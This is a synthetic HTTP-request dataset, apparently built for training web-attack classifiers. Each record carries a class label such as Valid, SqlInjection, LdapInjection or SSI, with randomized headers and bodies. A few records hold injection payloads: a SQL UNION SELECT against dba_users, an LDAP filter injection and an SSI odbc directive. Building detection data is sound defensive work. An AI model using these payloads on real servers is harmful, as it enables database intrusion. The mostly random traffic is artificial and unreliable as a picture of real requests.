X-Forwarded-For: 244.206.80.136
X-Serial-Number: 8388631449289131034
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ul4=a6lea1el&hhr=mf2&oohdte7eomt=mhttps1rlehrhservices:or4a e&rsios=ormss&N2YeeH5m=239530&tnEs0W7rEh=opiw2ef82iWgsof1e

End - Id: 4558
Start - Id: 6133
class: Valid
PUT /mtoyhagtoid2bhtos/l1Q/iXs66/kcnu1hoir2nsm.cgi? HTTP/1.1
Content-Length: 277
Content-Language: E
Content-Encoding: compress
Content-Location: http://3dig.ch/snesTzas.jpg
Content-MD5: Z2hlY25kcWVFc3VFdGE5cw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 May 06 03:32:21 GMT
Last-Modified: Thu, 19 Jul 07 02:08:12 CET
Host: www.iTbiok2tsi.it
Connection: rllenyu
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 59d9nN-la;q=0.2, D-mthcsmEu;q=0.5
Cache-Control: no-transform
Client-ip: 2.7.31.61
Cookie: peymeiei=mncshmEd(ee
Cookie2: $Version="901"
Date: Tue, 30 Oct 07 12:04:41 UTC
ETag: "jyQFaH4RlKaw88i"
Expect: meaF=Ewr0e;un9o=eexf1
From: Etnnkns@tnee.fr
If-Modified-Since: Fri, 28 Apr 06 16:53:46 UTC
If-Unmodified-Since: Wed, 18 Apr 07 05:21:08 GMT
If-Match: *
If-None-Match: "OALIR4HglQOnc@@"
If-Range: Sat, 28 Feb 09 22:47:08 CET
Max-Forwards: 8936
MIME-Version: 4.3
Pragma: eobCeex=ox
Proxy-Authorization: Digest algorithm=cedo
Authorization: sasap heea=Vreahc3
Range: -29,06-
Referer: http://nqaise.it/hmlsh/elea/nIrdtsQ.mdb
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
User-Agent: aewBVtnA http://www.ofpa9oyi.de
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7265x3057
Via: 7.3 www.datt1r.jpeg
Transfer-Encoding: gzip
Upgrade: pnds/8.6
Warning: 335 www.isiR.js "eyuxr" 
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_WOb9IH3_8V=095086&eeHje7ipmeeooiT=uel@a&EfnnotuaratipaC=707832&infmktpSoea=5OHgroei+GaB<child~heTIs&1sbiz=Tvges&ptleuoanipno=eTQ8EQ79eTV&bubkXttftkab=48&03lo14nostmac=nt&q8tv1m=34101&oh2nxftAullsafo=sYhnag&iUrobuiljrtoh=hiehljmdnbenoge&8qrUGeupdateof=ogrObrrCcyqsotett

End - Id: 6133
Start - Id: 34743
class: Valid
POST /tEZnbJnAak/sFU8LW6/cIfqF/9vvBY/r8.B/me8sz8O7tbqknnDEd/gfxnn9oiasvr/LCqdxc3DZJ/bhwgOz./esi4ehrwdnDo8rlNh/ssmnme/r@zpgnDgVh.mspx? HTTP/1.1
Content-Length: 36
Content-Language: eitsiasc,xa7TT5n
Content-Encoding: deflate
Content-Location: /Xogslaly/dxiehl.php4
Content-MD5: ZHJjd3JFaWVudHJtR3V2Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Dec 04 21:45:56 GMT
Last-Modified: Sat, 19 Jan 08 04:36:40 CET
Host: 26.33.34.155:80
Connection: rDho
Accept: application/rtf
Accept-Charset: x-mac-roman;q=0.2, hz-gb-2312;q=0.4, euc-cn
Accept-Encoding: compress;q=0.7, compress;q=0.5, identity
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 24.185.246.31
Cookie: feieed=48133;3d7ssgrh9ewc=eaEXttfovUnw
Cookie2: $Version="1"
Date: Thu, 22 Jan 04 15:58:52 UTC
ETag: W/"A2YfQVTZXS@2CEv"
Expect: 100-continue
From: tIeiaSrs@eek7eEs.com
If-Modified-Since: Thu, 03 Feb 05 02:15:08 CET
If-Unmodified-Since: Sat, 01 May 04 13:12:27 GMT
If-Match: "KYBuHkk6B2bIDiXB4u1"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic b3JyTzplMjVzbQ==
Authorization: NTLM c2ZyNTU3YWRudEdob3BlaXNoT05waEVpbnIwczFpenRzcmE1cHFobWljdFNl
Range: 25090-,2814-117748,72-
Referer: /lwyeo/uTltia5/emaj/6na0nshn.msf
TE: gzip;q=0.8
Trailer: TE
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 8.4; sj-it; rv:0.0.1) Gecko/76608890
UA-CPU: 68000
UA-Disp: 6894,585,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 420x8395
Via: 6.6 www.tdnlIs.htm
Transfer-Encoding: compress
Upgrade: r4ic/7.1, 0fe/0.7
Warning: 636 www.T3edR.css:19 "nPNuowhpty5d" 
X-Forwarded-For: 115.76.23.153
X-Serial-Number: 8267769973
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8fc9apbrsriTe=r13QTQV6I&yans0oeisa=0

End - Id: 34743
Start - Id: 35208
class: SqlInjection
GET /2fmei9nnh/-zZHNhriTsam@-/r7NUb28JrEHfV6-nI/e9PRE/jyK6kT/ytq/orknth0eoroOeheedTd/wtGEc0cnxZWq/eYiQ/bXe.jpeg?prluoaiheriol4e=62720471&rlliuhi4gt=u593hIap2rms%26E1&aat6no3ee=ashutdownt8echo&nONshlrs=96526911&cr=csrhmxieE&uoaeepsderoh=noNo+skposition+ihgneo&ls6X=76077&oeaajythi=fnmd&MNinsertWJscriptupdateqx=rI2_RwC1VFfI&rebd=nxVe%27+UNION+++%2F**%2F++SELECT+++ognwan++++FROM+dba_users+WHERE++O6reiypm++++like+%27%2525&bhscdodsae1se=Eh&Eeh4dfotT=8594023&ona=nvOx_BK&hMeyyty5=eariAf35idlhn2eea1&ichhcot5ph=6Aft HTTP/1.0
Host: 127.53.195.5
Connection: oetdne
Accept: audio/basic, text/html;q=0.9
Accept-Charset: iso-2022-kr;q=0.1, iso-8859-1
Accept-Encoding: identity, compress, compress;q=0.2, deflate;q=0.2, deflate
Accept-Language: lH1pdtp-nFyn0
Cache-Control: min-fresh=16550
Client-ip: 247.223.116.97
Cookie: syebryfS2eyesl=5686346825;geeiu=gi;mitodppiasxi2f=it9pMzevn2hsiodfy1;nne=841811
Cookie2: $Version="8"
Date: Wed, 19 Jul 06 02:03:01 UTC
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: duapjRis=awoeo;l1m7=3t6n
From: 1sbtaan@lile.com
If-Modified-Since: Sat, 07 Nov 09 13:51:49 GMT
If-Unmodified-Since: Wed, 01 Nov 06 05:35:13 UTC
If-Match: "D5QTuodPRr5EJ1mA"
If-None-Match: "kUWZ@JeHVBkKUlilNx"
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 34
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic RmVacGU6cmFzQQ==
Authorization: NTLM aHQzaGVudG50NXd1dG10ZXJoc2J6MWlyZWEya2VkeWVudFNqaXRyd2tiZXNz
Range: 351-,-4899
Referer: http://nlhnao6o.gov/etna/ienE/T4nt.doc
TE: trailers,chunked
Trailer: If-Match
User-Agent: Mozilla/6.5 (compatible; Konqueror/1.7; Mac OS X; qenR; nirnhFi)
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: deflate
Upgrade: iet/6.8, nt4/7.0, eolcon/0.5, onIars/2.7
Warning: 068 www.d4or.htm "ickomuotietSeActn" "Sat, 29 Jul 06 19:25:24 UTC"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35208
Start - Id: 5159
class: Valid
POST /ntfwrlnhbkm/nsyb2tefTopneoer/CmuielOsqeossym/owau5sCec/bdsu0eUMm/t8-CU/oxRlMwtax4xxVOE3EVo/a9fpriIo5JnG9490l-Do/YhiDjc/lu3Qv.png? HTTP/1.1
Content-Length: 90
Content-Language: terg,bheeuwd9
Content-Encoding: compress
Content-Location: http://toioc.ch/tteeTaBe/ente/osilh5h.php
Content-MD5: RGUzdGVSY2NyZ3NzYWFuMg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 10 16:40:04 CET
Last-Modified: Sat, 28 Mar 09 23:00:58 CET
Host: 181.201.103.124:89
Connection: ltte
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress, gzip, deflate;q=0.3
Accept-Language: Buo-nia9rge, ueaatAm9-aOemdeh;q=0.4, ce-bhAqn, e-g4zcldw;q=0.7
Cache-Control: max-age=06800
Client-ip: 255.199.204.229
Cookie: otanacahdhdoT=a6eeebSs3olnfaet;UoxMU5Qk4=hfni|eNdenoCr;hyA=923
Cookie2: $Version="60"
Date: Tue, 14 Oct 08 12:40:18 UTC
ETag: W/"p1v65rK72MAyffDeyZE"
Expect: lbmrnzl=nysd6rb
From: sttS3e@cNouiuhrt.it
If-Modified-Since: Tue, 16 Aug 05 20:14:57 GMT
If-Unmodified-Since: Fri, 19 Oct 07 09:44:03 CET
If-Match: "MZfnnsYzezxrffWjiZC9"
If-None-Match: *
If-Range: "BVUiWBYH8T3oezwbPG-f"
Max-Forwards: 9
MIME-Version: 5.5
Pragma: mru4aojn='qeidqce'
Proxy-Authorization: Basic NmV5cno6dWU5Ymc=
Authorization: ne5i eEta=tiiWu
Range: 216-,618823-20694,47-09
Referer: http://www.MtljAa.ch/sehh/wda3/ch5eh.conf
TE: trailers,deflate;q=0.9,trailers
Trailer: Authorization
User-Agent: nXgPD@ http://www.vubcg.it
UA-CPU: x86
UA-Disp: 279,387,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1638x365
Via: 8.0 153.86.101.224, 1.9 www.c0htt.png
Transfer-Encoding: compress
Upgrade: t9eB/4.7
Warning: 205 www.od5f.html "wlyis6aewo" "Wed, 10 Oct 07 03:40:22 CET"
X-Forwarded-For: 175.0.173.196
X-Serial-Number: 083639126
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hf=0updatehnr&arhtnujari=7&ctm=eauAhf ;si6&ns=sob&aDnEg=02754702&9S@.gZ-Z=eSynulleplChtd

End - Id: 5159
Start - Id: 1107
class: Valid
GET /ef8Gc85Pg/acceptL0window.openFy.cgi? HTTP/1.0
Host: www.yetsuo.org
Connection: close
Accept: */*;q=0.7
Accept-Charset: cp-932, windows-1255;q=0.7, shift_jis;q=0.3
Accept-Encoding: deflate, gzip;q=0.0
Accept-Language: *
Cache-Control: oncgo='ot4oelst'
Client-ip: 249.26.84.16
Cookie: ia3iih7heg1oD=a.NEQZqi;tEmte=590;lxs=986
Cookie2: $Version="48"
Date: Sun, 12 Mar 06 09:27:29 CET
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: ooRai=tosi3r;vOie8scE=evcs
From: hsrtboi@onni.cz
If-Modified-Since: Thu, 02 Feb 06 08:34:55 CET
If-Unmodified-Since: Wed, 19 Sep 07 18:45:22 UTC
If-Match: *
If-None-Match: "2rF-p_JGO5oas.sKpa"
If-Range: Sun, 31 Dec 06 07:15:43 UTC
Max-Forwards: 3
MIME-Version: 9.6
Pragma: aee49rz='xauenel'
Proxy-Authorization: NTLM c3RlY1JudGlvYmVpdGVhcWVkaUVkdHRobnJxZGVtcnRiaW5jaDJkTG90Mg==
Authorization: Basic aXNldHhuanM6bDBoMXNmdQ==
Range: 634551-,48052-6687,-9
Referer: http://fof4s.ch/geoldl/eVhtna2x/upw1T.tiff
TE: trailers,gzip;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.6 (compatible; MSIE 2.0; Open BSD i586; namasnm1m; ihxSrltt; dtndycRp)
UA-CPU: 68000
UA-Disp: 4228,5087,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8837x3320
Via: 0.8 www.arowo.htm, 2.9 www.dume.js, 9.4 www.trp9esd.shtml
Transfer-Encoding: identity
Upgrade: cMgino/5.9, daaYi4/9.7
Warning: 737 144.157.19.107 "tuN5hTIzo9baaeA" 
X-Forwarded-For: 36.96.25.139
X-Serial-Number: 627934
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1107
Start - Id: 32277
class: Valid
GET /icEHGnG/x.@_vg3xbcXEd/hq_/xt1xelcobSns/m3hseontte40ne/a8XvMnCPn-1V/en2e@5iY1as.cfm? HTTP/1.0
Host: www.sa1ndd0la.cz
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: big5;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 249.67.177.219
Cookie: orevalhttpskVstdinZ=eNnirarr;MWLincludev=sedibe;aioh=i4ofehruteTe;itteHid=eyei@
Cookie2: $Version="0"
Date: Sat, 01 Mar 08 16:41:56 GMT
ETag: W/"aM@leWAdJnHMJ4gYKNXN"
Expect: eaThfhct=dhaLir;soH2aoms=qTr0le4n
From: mnonn5h@wlv1.be
If-Modified-Since: Sun, 04 Oct 09 12:41:00 CET
If-Unmodified-Since: Thu, 12 Apr 07 08:18:19 UTC
If-Match: *
If-None-Match: "3QEOjtYsvBw5lsk"
If-Range: *
Max-Forwards: 59
MIME-Version: 9.5
Pragma: a='tpi'
Proxy-Authorization: Digest opaque="ojiWa2n"
Authorization: 79hn saDoEtg=ceejy
Range: -265,3-,-2
Referer: /eseatE/tnhy5sae/tew4/yNeuherd.wmn
TE: trailers
Trailer: Accept-Encoding
User-Agent: mgK.87nc http://www.eieh.uk
UA-CPU: x86
UA-Disp: 090,0267,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3225x292
Via: 2.6 www.sriF.gif, HTTP/4.8 www.a5ahbh.tiff:247
Transfer-Encoding: compress
Upgrade: igmn0b/4.9, aorfth/1.2, srr/7.4, mp7/8.9, npq/6.9
Warning: 276 144.197.192.204 "hsEwst6bs9l" "Wed, 19 Mar 08 20:42:32 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 1683204124679944
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32277
Start - Id: 19772
class: Valid
GET /l5q-Z/mst/e5dvVOq1V_fN6DnKZW.js?samrlocation-n=aah%3E&formhavingVC=373&kxWkAmgs=spa7iaAt&usMAdN=8i&rn9R=wadminnetcat1&Arus=md7p1&yEudii=inF&o5htirnn=25267&dthcisheQdad=5598803945&nugtegpY3to=2vjmdD0Ud-S&StO8o6stte=2woinsugrebo&ieqhHt0=06&1e9=477157649 HTTP/1.0
Host: www.srnefht.cz
Connection: ih6q
Accept: video/*, text/*;q=0.4, application/rtf
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: eNyiu-e;q=0.3, ix5eceih-dfau;q=0.5, t-oao;q=0.8, 5-o71q;q=0.8
Cache-Control: no-cache
Client-ip: 165.121.199.201
Cookie: nwDcq=83482;HSU.i68d=0;0aqtdfxngui=sjhdoga;e5iGmraeEdvgnt=8799
Cookie2: $Version="49"
Date: Mon, 16 Feb 09 03:52:06 UTC
ETag: W/"a7vuS_i3QokSvEb7n7"
Expect: eeEld
From: anaee@1dsrajaLrt.org
If-Modified-Since: Wed, 30 Dec 09 05:38:10 GMT
If-Unmodified-Since: Wed, 14 Jun 06 05:50:56 CET
If-Match: *
If-None-Match: "bP69Gil@KKGhFhsp"
If-Range: Mon, 19 Feb 07 05:14:52 GMT
Max-Forwards: 0
MIME-Version: 9.8
Pragma: mded7A=amsNh
Proxy-Authorization: NTLM MGNlYWFvM2M5YWxpaHJkdHVraG9ybnNic2F0eHVlZHVoSWRvaXk=
Authorization: minCsw brle=nahgeirs
Range: 74298-8299,-8816,29108-
Referer: /preq/4umea90.gif
TE: chunked;q=0.3
Trailer: Upgrade
User-Agent: ee.Dy-N2 http://www.adpoHn9.st
UA-CPU: PowerPC
UA-Disp: 108,777,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 951x1383
Via: 6.5 www.nviAf.png:7, FTP/7.2 www.cyaee.htm
Transfer-Encoding: compress
Upgrade: I4m9/3.2, eTss/9.1
Warning: 416 www.geeewv.png:396 "qliehpR7srsnhchrotf" 
X-Forwarded-For: 59.255.139.123
X-Serial-Number: 212517098577973192
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19772
Start - Id: 38863
class: LdapInjection
GET /gIefHTm.Qw-8X/xljaes/REXGS@oy/nRQU9TQjaBRANu-z/iidu0e/oPZpNRYnzT.h5T-H6mAC/@odwN/eC9C.-.msf?emr=rtHW%29%28%7C++++%28uoe%3D*%29&rPii=%25a%3Bn&uxsttonetr=6nud5te&lntto=m_FNVmP.F5u HTTP/1.0
Host: 104.165.43.123:467
Connection: e9iua
Accept: video/mpeg, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 214.111.130.134
Cookie: D72BBorNA=nlbtqeiatahrm;AV9qE=cet;orumttntrrhh7et=rxaRDz
Cookie2: $Version="90"
Date: Wed, 01 Feb 06 12:52:41 GMT
ETag: "PbMQvsd@O9GSQt4NCI2"
Expect: t02I
From: tdusret@b5koNnc.biz
If-Modified-Since: Sat, 17 Nov 07 16:01:50 CET
If-Unmodified-Since: Sun, 29 Jun 08 17:30:16 CET
If-Match: *
If-None-Match: "EijzNd0bPQmmndHU9"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.7
Pragma: soeEi='begit'
Proxy-Authorization: Digest username="m6Aioe"
Authorization: Digest opaque="xEati"
Range: 317-,-056
Referer: http://www.btdhtEo.uk/eete0t.js
TE: gzip;q=0.5,gzip,deflate
Trailer: Accept-Language
User-Agent: l@TyQOeq http://www.hhpeyih.org
UA-CPU: MIPS
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 1.3 134.108.212.227:66709, FTP/1.6 105.255.212.120:074, HTTP/3.3 www.dEhdyr.css
Transfer-Encoding: gzip
Upgrade: rang/4.2, ntdtl/5.2, nrNyk/9.6, Phof1/9.0, mtwom/4.4
Warning: 172 228.33.193.154 "nienhhonlnuio8cmpet" "Sat, 12 Aug 06 02:08:19 GMT"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38863
Start - Id: 32662
class: Valid
POST /chtrds1paey/9aeslaotjs/ihgNTCzJ6rfXCT1_KB/iQE_zbHdrl8fH2Ca.html? HTTP/1.1
Content-Length: 165
Content-Language: fb
Content-Encoding: identity
Content-Location: /qieof.asp
Content-MD5: NGVhbGVudGRlZWRhaTRpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Apr 10 12:36:38 UTC
Last-Modified: Sun, 10 Apr 05 01:50:53 CET
Host: 139.87.221.33
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.5, identity;q=0.3
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 164.66.145.18
Cookie: vBB6ipe=tKGPVR9ua;umutmnaegnorrca=8;is=w2WsmTt;MOe6ruetLm=5;62lfXD=systemm
Cookie2: $Version="661"
Date: Sat, 18 Feb 06 12:13:39 CET
ETag: W/"DRV@0Eo9shYkSmJnzwc0"
Expect: tseoEsms=st7mnws
From: t8whu@dszw.biz
If-Modified-Since: Sun, 06 Apr 08 16:49:55 UTC
If-Unmodified-Since: Fri, 01 Oct 04 14:41:59 CET
If-Match: *
If-None-Match: "OTDnp0Nbc.xWnad"
If-Range: Mon, 02 Aug 04 09:44:24 CET
Max-Forwards: 44
MIME-Version: 8.8
Pragma: Y='aeheHci2'
Proxy-Authorization: nsaea Rbis=Iad6tiRh
Authorization: nees iaoa=rmasH5
Range: 5-,-81662,01479-
Referer: http://o0ena.org/hkaom.php3
TE: gzip,trailers
Trailer: Warning
User-Agent: Mozilla/8.2 (Windows; U; Win98 2.7; ut-lA; rv:5.4.5) Gecko/64206490
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: HTTP/5.4 www.TebQsxd.png, 3.1 132.240.230.52
Transfer-Encoding: gzip
Upgrade: bes/5.0
Warning: 732 66.142.105.251 "rwaRrsaIalqta" "Sun, 12 Jul 09 20:33:14 CET"
X-Forwarded-For: 52.89.151.232
X-Serial-Number: 108492
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

16=iBJL7&m1FU7Ybgsound=sOop.0_z3&i7u.gA8IP2Z=pqnrtnn:thC&pnsWmidut=c2_Q&6tatPlkehneas=hErehatn&ooaa7as=40&bmqmrlayee=dvYnqwinntanph-usunodug'>r>&BCnph-6i=704

End - Id: 32662
Start - Id: 35003
class: Valid
PUT /uH/ebyUt6h/tV/7Thiti/i1afsd/eIWOyFJE02ccxvecdngj/qXJM--XY8QF.Ia_EsUU/eDqx9SlG/bg/xsXHTF.js? HTTP/1.0
Content-Length: 190
Content-Language: s6eo,etnlc
Content-Encoding: identity
Content-Location: http://www.fEeh.be/rfbrfee/yj47/vehe.wmn
Content-MD5: YXdpdHIyQ3V1Y3R1c3d5eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Sep 05 24:06:05 CET
Last-Modified: Mon, 21 May 07 17:04:12 GMT
Host: www.sh4zasneeo.be:27696
Connection: za5t
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s-5H, 7Ow-2u, l8rPur-persrr
Cache-Control: max-stale
Client-ip: 197.159.96.77
Cookie: 6c0choe8mGi1t=u1;.klq=T;libs_4A4Z=sor>iwinntS
Cookie2: $Version="86"
Date: Sun, 11 Nov 07 11:53:53 UTC
ETag: "YwF_ySK2C_R05P50"
Expect: aln3DpiH
If-Modified-Since: Fri, 12 Aug 05 02:20:09 UTC
If-Unmodified-Since: Fri, 01 Oct 04 08:44:55 CET
If-Match: "OBJqGhb3QL0dodP7sUZY"
If-None-Match: *
If-Range: Sun, 14 May 06 24:37:08 GMT
Max-Forwards: 656
Pragma: no-cache
Authorization: NTLM emVzMmVsZXN5NHJlbGFiZ3Vsbml0b2hJM3RlZW5pYWJ6MTJzczFhZXB5Y2lwZQ==
Range: -359
Referer: /dsbr/RloS39rl.asp
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: 1zdctbb/4.8.1.6.7
UA-CPU: MIPS
UA-Disp: 611,6268,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3778x0485
Via: TMmcpi/8.4 www.Tdss.png, 0.7 www.hsqlegur.html
Transfer-Encoding: eiwh; afue=tlEqel
Upgrade: 6eanj/6.8, HH2n/1.0, dmi/6.2, ixeo/8.4
Warning: 698 19.231.5.185 "eonlhdf2hoiie1ojylS" 
X-Forwarded-For: 151.22.66.165
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HCo-=9858907&xseirWhte=iexecc&0neuwe8=MMI&xgf.VHWu4fD_= ylbredemausrrt2]ak]&om=eAMyJjc&rg7mnah=1589362&ooadaotae45ys=iqre&Rtajixel=kvcoham&EUGTbind663n8=986302&uhTeo2lu5kdai=)all@tmp

End - Id: 35003
Start - Id: 40861
class: SSI
GET /m5gUsv0nso7NzdIy25/rntbp9/tTsoeteweD/caw@/6hclbvDnoeharEaboo.htm?0tQzqlogshutdownxtermaS.3=0221030&arDtx=5874987035&nYrdqsp=ll&tatee=kqJYNnlo%40&aY68po=%3C%21--+%23odbc+++connect%3D%22tRrlf%2Ctq%2Clist%22+++statement%3D%22select+++*++++from+++++W%22--%3E&idemF5qtjKtns=InihhehhS&GGRjBpositionL52e0=1965782282&sn3clpetr=aM%40p&ttis9=903645154 HTTP/1.1
Host: www.htene.uk
Connection: fihe6o
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-stale=2894
Client-ip: 183.188.60.40
Cookie: Sshutdown8dCOWBMSn5=idm8siae;85_NjSd0=>n;cSusdghhs=lveek;Rssnia=le0om&a4a;1jsnew=4eeor;iIo=/esexechin
Cookie2: $Version="380"
Date: Sat, 10 Mar 07 13:32:52 GMT
ETag: "l8YqCEbciYrBlazH.KJE"
Expect: ahutgh=Zrti
From: ednaAi@brso.de
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Tue, 08 Jun 04 07:31:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5496
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: 982-719379,-7604
Referer: http://www.DrjFtigo.com/tdrfmi/oEyween.bin
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.2 (X11; U; Open BSD i386 2.9; ug-ho; rv:2.6.5) Gecko/21728183
UA-CPU: x86
UA-Disp: 2426,7787,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5993x410
Via: 5.9 203.65.239.214:4
Transfer-Encoding: identity
Upgrade: iTdaap/8.9
Warning: 001 94.18.227.26 "tarnYgrgo4d" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40861
Start - Id: 25524
class: Valid
GET /tzy7B/CatmpexecfX/exZRGYxJC/VRVbMWautoexechttp4XMdTtV.html?rnolrraa=14680655&q4Eea=756487&vi=66959512&iyd=2286&naCyoya=47&bNtzx=sf&qTmAQ=4ahiTOIjteat&QProoiIaut=siLaiabt4ctaX7da&cetwkhri=reisuorejrlirgpytH HTTP/1.0
Host: www.8s7ced.st
Connection: eShemo3o
Accept: */*
Accept-Charset: iso-8859-4;q=0.4, euc-jp
Accept-Encoding: identity;q=0.3, gzip, identity
Accept-Language: yUeggh-ne6znr1, 7ut-s7E6fs, 5-wmd
Cache-Control: max-age=0
Client-ip: 48.113.165.204
Cookie: u8fatea=u%;3tiefiumpi5=55823967;te8=0531
Cookie2: $Version="39"
Date: Mon, 10 May 04 09:24:49 CET
ETag: W/"2HygnodO_Jen40r.tb"
Expect: 100-continue
From: osil@wYub.gov
If-Modified-Since: Sun, 26 Oct 08 11:18:16 GMT
If-Unmodified-Since: Fri, 20 Mar 09 06:47:08 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 973
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic bm9yZzFyOm93c28=
Authorization: NTLM aWF5c2VuZWkxdXVxODc4bWx3bGFsRWFzcmVvODNvNWNjaXI4d3RlaXNmNzFuZw==
Range: 667-742
Referer: http://e1d1t.biz/i5n3n/heovd/innYn.aspx
TE: gzip
Trailer: Date
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 0.4; gk-de; rv:7.1.1) Gecko/85992419
UA-CPU: MIPS
UA-Disp: 0020,943,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5796x493
Via: HTTP/5.6 118.114.225.149:693
Transfer-Encoding: compress
Upgrade: utH/5.0, httwz/8.8, luydy/3.7, rLo/1.4, iool1/1.7
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 9918504
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25524
Start - Id: 15200
class: Valid
GET /t3raiIdPevme/ss/ow3twoq2rh/sCt-/LoEAjyBfTtQx/jzc/o6zAf4tcP6/oFoCve.kYLzqK.s6k/5lTinse/hZbcB3t8E.Un6.jpeg?pSeob0ess0th=r&hratifsemJtNe=58045&hor=bodyouaTTdw&ii5dsid=3topendbi9psetgc%27%27&rg5=eDpMA&ahthrn2Eto=nl%25wtorf1hor&taat1mtgje5rwp=a+execleoemsock_stream%28o&DVD7bwuLwK1=i%5ClseN&oBlifnnlyEvo=4 HTTP/1.1
Host: 98.15.78.218:762
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.5, compress
Accept-Language: ehh-a;q=0.5, fktubras-mntlMoe8
Cache-Control: no-cache
Client-ip: 49.90.43.231
Cookie: 3zZNncdUt=a 88=;eipfti=94131942;w5pwl==h$;0s=hetwt;reuisEilsrS=pisdhboot.inipea=n]lIeR;dct97gTomaupee=c@Ai
Cookie2: $Version="700"
Date: Sat, 07 May 05 06:31:37 CET
ETag: W/"1CooHu3lz-769rZ8r"
Expect: 100-continue
From: ahtrq5j@fhrnWs.it
If-Modified-Since: Fri, 15 Apr 05 06:50:09 UTC
If-Unmodified-Since: Tue, 21 Sep 04 09:57:39 UTC
If-Match: "KeqJ0Y@07cdu-i5hbs"
If-None-Match: "T9QuZqQJlcoaDP_02g"
If-Range: Wed, 20 May 09 18:16:07 CET
Max-Forwards: 60
MIME-Version: 1.4
Pragma: isiteh=Md
Proxy-Authorization: Digest realm
